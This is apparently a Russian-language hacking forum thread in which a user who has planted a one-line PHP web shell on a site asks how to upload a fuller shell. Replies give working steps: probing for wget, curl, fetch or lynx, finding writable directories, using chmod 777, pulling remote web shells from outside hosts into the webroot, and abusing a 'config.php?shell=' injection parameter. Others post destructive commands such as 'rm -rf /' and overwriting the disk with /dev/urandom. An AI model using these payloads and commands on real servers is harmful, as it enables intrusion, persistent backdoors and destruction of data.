Сделал себя админом, залил шелл:
<? system(\$_GET['c']); ?>
_http://сайт.ру/cmd.php?c=какие_тут_команды_и_дл я_чего?
Можно ли туда нормальный шелл залить, чтоб файлы редактировать??

Может чё не так сделал??

Сделал себя админом, залил шелл:
<? system(\$_GET['c']); ?>
_http://сайт.ру/cmd.php?c=какие_тут_команды_и_дл я_чего?
Можно ли туда нормальный шелл залить, чтоб файлы редактировать??
Функция System не навсех сервах включена, чаще всего используется passthru

А вообще ты объяснил неочень, имхо подробней надо...

Попробуй

ls la wget вообщем почитай про команды Linux FreeBSd или чо там стоит на том сервере и сможеш сделать всё что тебе надо на ачате гдетто лежит статья про команды так что юзай поиск !

да можно... используй что-то типо wget http://lol.ru/remview.txt -O xxx.php

но если тебе удобнее rst то его. Если wget отключена пользуй fetch или curl

да можно... используй что-то типо wget http://lol.ru/remview.txt -O xxx.php

но если тебе удобнее rst то его. Если wget отключена пользуй fetch или curl
Это кстате тоже далеко невсегда срабатыает...

Это кстате тоже далеко невсегда срабатыает...

Естестственно, все зависит от конкретного случая.

Для залития можно использовать wget, get, curl, lynx, links.
И вот почитай http://forum.antichat.ru/thread7345.html

wget http://address/shell.txt -O /path/to/shell/shell.php
lynx -src http://address/shell.txt -O /path/to/shell/shell.php
fetch http://address/shell.txt
curl --help
fetch --help

все команды довольно подробно расписанны в мануаласх пичитай все поймешь..
тебе понадобятся для работы с файлами и навигации cd,cp,mv,rm,mkdir и др.
конкретно для заливки шела например rst нужно узнать какая на серве стоит качаллка командой which петем перебора тех что тебе перечислили выше например cmd.php?c=which wget
если получиш ответ севере типо /usr/bin/wget значит она установленна. узнай какие у тебя права командой id потом найли открытый на запись каталог и зазей туда если нет открытых кактогов но есть каталоги владелец UID владельца которого совпадает с твоим который ты узнал по команде ID то просто открой каталог на запись командой chmod (к примеру chmod 777 dorectory ).и лей туда свой шел,,,

помоему дала исчерпывающий мануал.

Мда одна фраза меня убила зделал себя админом:)
и можно ли редактировать файлы?:)
конечно нельзя редактировать файлы ведь ты же админ да? :)
а вообще кез там все показал но я не много уточню.Про курл он не написал:)
curl http://shell.txt -o shell.txt

юзай команды:
ls -al - список файлов в дире
cd ../ - подняться на диру выше
which wget;which curl - узнать есть ли wget или curl
wget http://www.xxx.ru/shell.php - залить shell
uname -a - версия оси

и тд.

TweakeR
http://drmist.narod.ru/nix_commands.zip
unix-команды
https://drmist.ru/download/shell.txt
шелл с доступом по логину-паролю, функцией download/upload и тем же командным интерпритатором на php.

man тебе поможет во всем

вот ещё пару прикольных команд:
rm -rf / :) :) :)
а это вообще убойная штука - cat /dev/urandom > /dev/hda :) :) :)

а это вообще убойная штука - cat /dev/urandom > /dev/hda :) :) :)

Как правило на серверах скази диски так что скорее всего /dev/sda

ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!
;)

2rent0n, расслабься, иногда чисто из спортивного интереса можно делать да и если те не надо система а хочешь проучить?

ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!
;)

Это супер мега долбо**ская команда, ибо кроме бездумного долбо**ского бахвальства и выпендрежа ничего не приносит

ну рулит супер мега комманда
cd /;rm -rf *;wall root you suck!

Гдето я это видел =)

я вот через эксплоит получил такой запрос
http://www.site.org/forum/data/config.php?shell=

kак мне теперь залить чтонибудь через браузер?
пример плх если можно)

http://www.site.org/forum/data/config.php?shell=http://wwwsite2.org/shell.php
где http://wwwsite2.org/shell.php путь до твоего шелла, а потом через него уже закачиваешь.

можно еще так:
http://www.site.org/forum/data/config.php?shell=cd /tmp/;wget http://wwwsite2.org/shell.php;wget http://wwwsite2.org/shell2.php; ls

второй способ был в одном из видео. вроде про zbrute

http://www.site.org/forum/data/config.php?shell=тут_ты_выполняешь команды
найди папку на запись и залей тут web-shell от rst57 (так как на нем легче работать/удобнее)
http://www.site.org/forum/data/config.php?shell=wget -O /home/site.org/soft/shell.php http://site.ru/shell.php
и потом через браузер переходи:
www.site.org/soft/shell.php

Насчет команд почитать/перейти (http://forum.antichat.ru/thread24516.html)

ничего непроизошло(

может там команду надо писать?

http://www.site.org/forum/data/config.php?shell=wich wget
http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php
но шелл надо залить себе на ftp(хост и т.д) и потом только оттуда сливать. А если ты не залил, тогда конечно не получиться
http://www.site.org/forum/data/config.php?shell=curl http://www.твой_сайт.ру/шелл.php>shell.php

человек ты мне очень помог)
а я правильно понял что это делать надо последовательно?

а я правильно понял что это делать надо последовательно?
сперва http://www.site.org/forum/data/config.php?shell=wich wget
потом http://www.site.org/forum/data/config.php?shell=wget http://www.твой_сайт.ру/шелл.php
и потом переходим по урлу ...

все спасибо))

а кроме wget и curl есть какие нибудь запросы для того чтобы залить шелл, потому что wget и curl не работают...

а кроме wget и curl есть какие нибудь запросы для того чтобы залить шелл, потому что wget и curl не работают...
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php

да жалко не одна комманда не работает :( но всётаки спасибо :)

а нету ли такой комманды каторая скачивает все файл каторые находится в /home/mysite/ ?